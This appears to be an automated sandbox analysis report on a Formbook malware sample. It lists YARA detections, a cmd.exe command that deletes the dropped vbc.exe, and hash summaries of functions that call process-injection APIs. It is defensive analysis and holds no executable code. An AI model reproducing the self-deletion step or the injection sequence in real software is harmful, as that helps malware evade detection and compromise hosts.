00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2820 Parent PID: 2332

General

Start time:	11:34:30
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4ace0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2300 Parent PID: 1960 vbc.exeCOMMON

Executed Functions

Function 00641C1E, Relevance: 12.2, Strings: 9, Instructions: 941COMMON

Download Yara Rule

Strings

V, xrefs: 0064287D
W, xrefs: 00642B7D
(, xrefs: 00642765
`, xrefs: 00641CCB
], xrefs: 00642489
_, xrefs: 006423A5
Z, xrefs: 00641FFA
V, xrefs: 006425D4
?, xrefs: 0064221B

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID:
String ID: ($?$V$V$W$Z$]$_$`
API String ID: 0-2930702816
Opcode ID: 782e893af1c4488463e7bd06952994db859815b219f4f3ae6f343ebc7f98c904
Instruction ID: 691aab05304705c0c31af51566cfa235951f8654aca0c29fdb484949bb2bd441
Opcode Fuzzy Hash: 782e893af1c4488463e7bd06952994db859815b219f4f3ae6f343ebc7f98c904
Instruction Fuzzy Hash: F7923570D4922ACFDB24DF65C898BEDB7B6AB49304F2081EA911DA7291DB344EC5DF04

Uniqueness

Uniqueness Score: -1.00%

Function 004501E4, Relevance: 2.0, Instructions: 1981COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ebaec84e425145c671363ce5cae5df6e32aa001234d36fac4ca1711aed3ffb
Instruction ID: d4735ce1be8b87a5eefd3233b379e2d170d160139cb6a880d7c782605c6a4aed
Opcode Fuzzy Hash: b4ebaec84e425145c671363ce5cae5df6e32aa001234d36fac4ca1711aed3ffb
Instruction Fuzzy Hash: 2923C734A40219CFC754DF64C894AE9B3B2FF8A318F1186E9D409AB365DB35AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00450681, Relevance: 2.0, Instructions: 1979COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7784559edd017fcc773d34d834ba4ad657a3d356fb2e64070c8debed9e265419
Instruction ID: 3234ec2f51f23558055625f73c6369440681b30b0363f3a07c3714fe8f34d80d
Opcode Fuzzy Hash: 7784559edd017fcc773d34d834ba4ad657a3d356fb2e64070c8debed9e265419
Instruction Fuzzy Hash: 2923B734A40219CFC754DF64C894AE9B3B2FF8A318F1186E9D409AB365DB35AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00452FB8, Relevance: .9, Instructions: 939COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce8bac8f22b629e1aec10e3f1f8eb5cf7d5c573ca7a65d287f13ed152dd8b80
Instruction ID: 32ccf7b2b454797e8ec96d6c536872afc81d6b0edda1fa826293348837334cdd
Opcode Fuzzy Hash: 5ce8bac8f22b629e1aec10e3f1f8eb5cf7d5c573ca7a65d287f13ed152dd8b80
Instruction Fuzzy Hash: BC92EC71D05268CFEB28CF56C8483EDFAF5BB49346F1480AAD409A6292D7784BC9DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00454260, Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0165d00751d444933d64f74bb9592b230d2f9e2cf48d065ceb753544fbc9c4
Instruction ID: b535b8bc3f02497d346b37344290f8c9f4824dc78384bf90cacfdc10aa94c0fe
Opcode Fuzzy Hash: bf0165d00751d444933d64f74bb9592b230d2f9e2cf48d065ceb753544fbc9c4
Instruction Fuzzy Hash: 538135B4D093588FCB05CFA9D8546EDBBB5BF8A304F14806AD849EB352DB34594ACF11

Uniqueness

Uniqueness Score: -1.00%

Function 004542E0, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46beb2551b351ac1ae5866c1cc66673cff3c58d5be4fe524edcf9c2de2f97b3e
Instruction ID: e4c9d09fd584c3aec5d00b4ba2c7be7f0246c82027b2b21ac35460cfb14af306
Opcode Fuzzy Hash: 46beb2551b351ac1ae5866c1cc66673cff3c58d5be4fe524edcf9c2de2f97b3e
Instruction Fuzzy Hash: B161EEB4E00218CFDB14CFA9D9446AEBBF6BF89305F10812AD909EB351EB349985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00642DF0, Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00642FF4

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1acd943e5f9d6262c7e9ee854e40b6a6338af33e9799163b0a08566269c3c8a5
Instruction ID: 88c9025550a736523f3605967062ea4b56f93de1be004b5ee4ee1cdab1130502
Opcode Fuzzy Hash: 1acd943e5f9d6262c7e9ee854e40b6a6338af33e9799163b0a08566269c3c8a5
Instruction Fuzzy Hash: A991F174C04269CFCB25CFA4C850BEDBBB6BF09304F1495AAE908B7251DB309A89DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00642E18, Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00642FF4

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9878606d46dfe8f472cf096b9b74db2bf13a7045e0c125eff671a5615e8bc527
Instruction ID: c0917c7f5ecb6a3b7bf624d460ef976646865ec19281e8ce69bee88660bb4b9e
Opcode Fuzzy Hash: 9878606d46dfe8f472cf096b9b74db2bf13a7045e0c125eff671a5615e8bc527
Instruction Fuzzy Hash: 3381CF74D00269DFDB25CFA5C940BEDBBB6BF09304F1095AAE508B7251DB309A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 006434A8, Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00643586

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eea42f289b01f6a3fcdb0ee468ead9eb7d2326696c35ddc2d00b6c3331203d18
Instruction ID: 0bc7702c09ed7adb1d1f0161be078c4b2b8e185de816ea87aef908057de75e22
Opcode Fuzzy Hash: eea42f289b01f6a3fcdb0ee468ead9eb7d2326696c35ddc2d00b6c3331203d18
Instruction Fuzzy Hash: 034188B5D002589FCF14CFA9D984AEEFBF1AB49314F24942AE818B7310D335AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 006434B0, Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00643586

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 70d3f3bf3948a0635407d3e9120be3068e0e6de8262a3c06bf4e5a111e3bedf5
Instruction ID: 4354e145e8822e9c58b6fd336f354f75cc377fd155f521f9565cbf790bde80be
Opcode Fuzzy Hash: 70d3f3bf3948a0635407d3e9120be3068e0e6de8262a3c06bf4e5a111e3bedf5
Instruction Fuzzy Hash: CF4176B5D002589FCF14CFA9D984ADEFBF1BB49314F24902AE818B7310D334AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00643268, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00643325

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 47c2b4ac8f8e76603a82dda8fd87cd30165c744b4a05904c9d1fa435f198952c
Instruction ID: 0c0a32c8d0215d2c31d9c98149e190c55473b4703e998f0ea0be358160679db3
Opcode Fuzzy Hash: 47c2b4ac8f8e76603a82dda8fd87cd30165c744b4a05904c9d1fa435f198952c
Instruction Fuzzy Hash: D54198B4D002599FCF10CFA9D984AEEFBB1BB49314F20A02AE814B7310C335AA05CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00643270, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00643325

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 12b7955d7d47013d48072c9abfafd223c375fc64bac3655a28ac9bbc5f72a448
Instruction ID: 969f215adaca4ebc44206ad922f5c1f2aaf3f5424a077380d63bc46e63724237
Opcode Fuzzy Hash: 12b7955d7d47013d48072c9abfafd223c375fc64bac3655a28ac9bbc5f72a448
Instruction Fuzzy Hash: C94175B9D002589FCF10CFA9D984ADEFBB1BB09314F20A02AE814B7310D735AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00643390, Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00643445

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4a211ca5cf38d8c788afccb88f9b190808ad4fbbcd48ae919b86327780230854
Instruction ID: b72e7fae010b1e00ba651980a53a1e5246e4ac3e1e6904e70389a768446d858a
Opcode Fuzzy Hash: 4a211ca5cf38d8c788afccb88f9b190808ad4fbbcd48ae919b86327780230854
Instruction Fuzzy Hash: D84168B9D04258DFCF10CFA9E884ADEFBB1AB59314F24901AE814B7310D335A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00643398, Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00643445

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 64809fbf145234740aa0dcf902f490267023e5569d048043f99445353b48c2c6
Instruction ID: 11532fa12f6fbf9942ae935f7e61b0445e8abbc381e9156087557f1458495c8b
Opcode Fuzzy Hash: 64809fbf145234740aa0dcf902f490267023e5569d048043f99445353b48c2c6
Instruction Fuzzy Hash: 9A3157B8D002599FCF10CFA9D984ADEFBB5BB59314F20A02AE814B7310D335A906CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00643148, Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00643202

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 35e4bd2c60c5a65ffcfd7436b2be9970dffcac295d0960285d842797da30d593
Instruction ID: 43f1486500714661fa92d17af2d967056237f1b2607c437ac016b83f01477c94
Opcode Fuzzy Hash: 35e4bd2c60c5a65ffcfd7436b2be9970dffcac295d0960285d842797da30d593
Instruction Fuzzy Hash: DD418AB4D012599FCB14CFA9D884ADEFBF1BB49314F24802AE418B7350D779AA46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00643150, Relevance: 1.6, APIs: 1, Instructions: 92threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00643202

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a14624805dadb08ff973b4b418f25e10eb8c693c2face8b5b75a1c4a3e7b7e65
Instruction ID: 020ad1ed9470999721d27033a623ed0f0df46718dde1ed2784672edad7167239
Opcode Fuzzy Hash: a14624805dadb08ff973b4b418f25e10eb8c693c2face8b5b75a1c4a3e7b7e65
Instruction Fuzzy Hash: 024198B4D012599FCB10CFA9D884ADEFBF1BB49314F24802AE418B7310D778AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006435FA, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0064367E

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 12b5f52cd748b7f509bb7a8aa8a24fbe30e4877067d955502ab02fc2d7e7609b
Instruction ID: aa3dd83032a7ef01f91dc876b1af94563ed02a1135fb762189daf1eb190a07b9
Opcode Fuzzy Hash: 12b5f52cd748b7f509bb7a8aa8a24fbe30e4877067d955502ab02fc2d7e7609b
Instruction Fuzzy Hash: B6319AB4D002599FCB10CFA9E884ADEFBF4AB49314F24945AE818B7310C335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00643600, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0064367E

Memory Dump Source

Source File: 00000004.00000002.2160624515.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3e1ffbfd2f78b6f28bd365bd8fed57d0f22b1fe9e83d6f155f49856c15be8d47
Instruction ID: 36789943c83afd3cfa36e792e0708b4690af4bf28c2d53dace1f4d166d65cbf7
Opcode Fuzzy Hash: 3e1ffbfd2f78b6f28bd365bd8fed57d0f22b1fe9e83d6f155f49856c15be8d47
Instruction Fuzzy Hash: 683189B4D00219AFCB10CFA9D884ADEFBF5AB49314F24941AE818B7310D735A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00454C26, Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

E, xrefs: 00454C2E

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 37c459be219b71edf34dff75d760db6e58965dc84e025c7d227ff8179f3d8751
Instruction ID: ae3c902eb8e02aa39764ce7cd80b377fb7e857342931a8406a6e0eba781606f3
Opcode Fuzzy Hash: 37c459be219b71edf34dff75d760db6e58965dc84e025c7d227ff8179f3d8751
Instruction Fuzzy Hash: 54512874D05219CFCB00CFE8C484AEEBBF1BF89319F25951AD805AB256C738A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00450128, Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

}?, xrefs: 00450128

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID: }?
API String ID: 0-3368467994
Opcode ID: feedc54ce4022a4968d1a268c05c60c85ea446cc76c2c6bb88d7d456574fb0c1
Instruction ID: 44d8e07dc539f992fc441c07e99569241c21a0402a2162fdceb03dfdac06f102
Opcode Fuzzy Hash: feedc54ce4022a4968d1a268c05c60c85ea446cc76c2c6bb88d7d456574fb0c1
Instruction Fuzzy Hash: D3318938A012089FCB09EFB8D8949EDB7B6FF89315F009469E805B7261CB30AC44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0045472C, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab2c8be06198109ec307671cfa8405277162beb3c3a2cb6d7b97eaac5443f32
Instruction ID: eea5c94d54475db9ba6cd7e4ff735460d73c2bc2675e4b012004be40ae50ee4a
Opcode Fuzzy Hash: eab2c8be06198109ec307671cfa8405277162beb3c3a2cb6d7b97eaac5443f32
Instruction Fuzzy Hash: 2791F674D00228CFDB50DFA4C884BDDBBB6BF89319F50849AD509AB252DB349E89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 004502E4, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16586dbaae494852b436f193ea03f94ec072df0378880d90b712ca9ea87afbc6
Instruction ID: 736dac6d80f4c6f861330144f6d911f991fc71d97e8869d7d849ef2749434ed0
Opcode Fuzzy Hash: 16586dbaae494852b436f193ea03f94ec072df0378880d90b712ca9ea87afbc6
Instruction Fuzzy Hash: 2351E374D002198FDB08DFE5C9487EEBBB6FF89301F20842AD405A7391DB794A89DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0045293B, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2784352753b9ba18c199474430156a5be50cd54111a8e49037df80a3300a1a8b
Instruction ID: fc05286aab62f2982d244a884921fcdb40b8da16199be9aa827f27d502f4fdac
Opcode Fuzzy Hash: 2784352753b9ba18c199474430156a5be50cd54111a8e49037df80a3300a1a8b
Instruction Fuzzy Hash: A6513774D002589FDB09DFE1D9486EEBBB6FF89300F10802AD405A7391DB794A4ADF91

Uniqueness

Uniqueness Score: -1.00%

Function 003FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160513433.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ead2acc720f58992fdc8b7dc570e4937f9ced6f29f07b0dfc348f319ba15268
Instruction ID: ec583d56630a41bc7f51344588c2e77041d0689366fb111cec3af03852b47032
Opcode Fuzzy Hash: 4ead2acc720f58992fdc8b7dc570e4937f9ced6f29f07b0dfc348f319ba15268
Instruction Fuzzy Hash: BC210775604209DFDB16DF10D988B26BB66FB84314F24C96DD9094B746CB36D807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003FD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160513433.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad0edd9fb7bc2c00c04fda3842b966deaa277e5ce7991ed72455f1a36c713bf
Instruction ID: 54b482aa9538370d6e9bc7c3a476afe2d560328c045c984ccdd5678602e9cff2
Opcode Fuzzy Hash: bad0edd9fb7bc2c00c04fda3842b966deaa277e5ce7991ed72455f1a36c713bf
Instruction Fuzzy Hash: 4F212975604208EFDB06CF50D5C8B36BBA6FB84314F24CD6DD9094B646C736D806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160513433.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de898f1bbd755376eec16a67b34a67ba0b11ded3a08777da9c8fa602fa19719b
Instruction ID: 850b99f46f319ab224baefed53a59bf8f0e735ce86007e031ab9d7f9177216ba
Opcode Fuzzy Hash: de898f1bbd755376eec16a67b34a67ba0b11ded3a08777da9c8fa602fa19719b
Instruction Fuzzy Hash: 40218E755093848FCB03CF20D994715BF72EB46314F29C5EAD8498F2A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 003FD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160513433.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction ID: 06e0d7dcb94134b40012b22b1b1fac9e2f356e29273a06024caef2a7fbd20551
Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction Fuzzy Hash: 89118E75504244DFCB16CF10D5C4B25BBB2FB84314F24CAAED9494B656C33AD85ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 003ED1D5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160403341.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59593abde634d508199fce417a88ec454d96bd4962c947e74dde407e45e89755
Instruction ID: 2f3d23742aa71db38e17406b428447268bff52cebcbab3ddba6e7d442ab3886d
Opcode Fuzzy Hash: 59593abde634d508199fce417a88ec454d96bd4962c947e74dde407e45e89755
Instruction Fuzzy Hash: B901A7314043949AE7118B66C884B67BBDCEF85764F18C92AEE445B6C2C379EC41CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00450428, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c093e7d736375ff54ca208044d67f7cdd6089866783967b15b5a39acf0264f
Instruction ID: c9241ae276026f713d3cadb74de0770f2c5e81e53c3b541f76de05a83d78bc0c
Opcode Fuzzy Hash: f3c093e7d736375ff54ca208044d67f7cdd6089866783967b15b5a39acf0264f
Instruction Fuzzy Hash: F8F0F62448A284AFC706DBB45C619EE7F789F53309B0408EFC84597163DB284E08E722

Uniqueness

Uniqueness Score: -1.00%

Function 003ED1D4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160403341.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc00a6681934a0972ca568b58531f46abc9c2720dd914a7c3d54b73cf9d71734
Instruction ID: 652cd70747bc7af6a55a0436fed026973789904b15b080fc1875a695988fc26f
Opcode Fuzzy Hash: dc00a6681934a0972ca568b58531f46abc9c2720dd914a7c3d54b73cf9d71734
Instruction Fuzzy Hash: 71F062714046949AE7118E16C888B62FFD8EF95764F18C95AED485B286C378EC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0045BC1F, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cef2f7f61c446b0eeb577da9ea4bb495a79fb505a62a418beb127c47349ce73
Instruction ID: 63ca69eb9e1e01cd0c2c3131eaa1a3b34fd6aac529644d988cd8a2217ed1bcae
Opcode Fuzzy Hash: 1cef2f7f61c446b0eeb577da9ea4bb495a79fb505a62a418beb127c47349ce73
Instruction Fuzzy Hash: 59014B70805208CBCB25DF20CC88BECB7B4FB49301F2090DAD409572A6EB301A89EF84

Uniqueness

Uniqueness Score: -1.00%

Function 00454580, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6333f84567f2806223716eab61768f9bdf57052f2038a34a362d571c073f630
Instruction ID: 577906653a97ba29c7c074e9c61dd23896aec548c11248070842e6d7ab52297e
Opcode Fuzzy Hash: b6333f84567f2806223716eab61768f9bdf57052f2038a34a362d571c073f630
Instruction Fuzzy Hash: 53F08C70C4A288AFCB02CFB499545EDBFF4AB46302F1481EBD809D3352E2390949EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00450448, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91408d43e5db10fd03bab60308c7ea56b8288639af4e9e14442ca001a064b374
Instruction ID: 2dcaaab6ffe6333910a63915de74c35e5c74f8decc8ab51ffafe0723c9aedd2f
Opcode Fuzzy Hash: 91408d43e5db10fd03bab60308c7ea56b8288639af4e9e14442ca001a064b374
Instruction Fuzzy Hash: 2AE04F34942208ABCB48EBF599126BEB3A9DB4230DF1018BD8909A3252DF398E04E645

Uniqueness

Uniqueness Score: -1.00%

Function 00454D59, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8cd5d4dec16bd18a6a0ee21fe5b1189aa21afac942b71981ed324057dd04ae2
Instruction ID: c1cd0dab85aeea780b257d67eaee3641120cae1fa4b97c23a61be44bfc806b69
Opcode Fuzzy Hash: f8cd5d4dec16bd18a6a0ee21fe5b1189aa21afac942b71981ed324057dd04ae2
Instruction Fuzzy Hash: 14F030708192889FCB01DBB4D8856ADBFB4AB46346F1581DAC80897353E670495DDB52

Uniqueness

Uniqueness Score: -1.00%

Function 0045FCF0, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e427d34d5c749b617b0d27f1613b1807d9535d93980df884740744abc6454e2
Instruction ID: ae361c62bf1748cd2da877ecbcd420bba6c02f97121282314a8ea95d68d1686d
Opcode Fuzzy Hash: 4e427d34d5c749b617b0d27f1613b1807d9535d93980df884740744abc6454e2
Instruction Fuzzy Hash: 61E0C9B4D442089BC700EFA4E8496ADF7B8AB45305F1091A9DD09A3351E7755A08DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00453EC8, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba06b84ccc1c3fd01f02da3d6c4264299421c33236b25fc89e394ba65ba715d
Instruction ID: fcc3d0872f1ff9a523b7994d0afcefc1d77ba8331b191340da501c46db4b7196
Opcode Fuzzy Hash: 0ba06b84ccc1c3fd01f02da3d6c4264299421c33236b25fc89e394ba65ba715d
Instruction Fuzzy Hash: A8E039B7D081A88BCB228B94DC115DCBB70EBA6352F0400D7D9489B222D3359B5ADB42

Uniqueness

Uniqueness Score: -1.00%

Function 004578B3, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3136e1bf4af16da8490a3c91a47741d2990ed135cd9a747098448eab429f5c5
Instruction ID: 21b651cf99045e5d2731f5c6aab59a543136be362be31b2f4096adeefd2d577a
Opcode Fuzzy Hash: a3136e1bf4af16da8490a3c91a47741d2990ed135cd9a747098448eab429f5c5
Instruction Fuzzy Hash: C0C08CB0808218CFC722CB00EC045B8BBFCAB08307F1090E1940E52622C7300EC4CF26

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00456F6D, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

9, xrefs: 00457299

Memory Dump Source

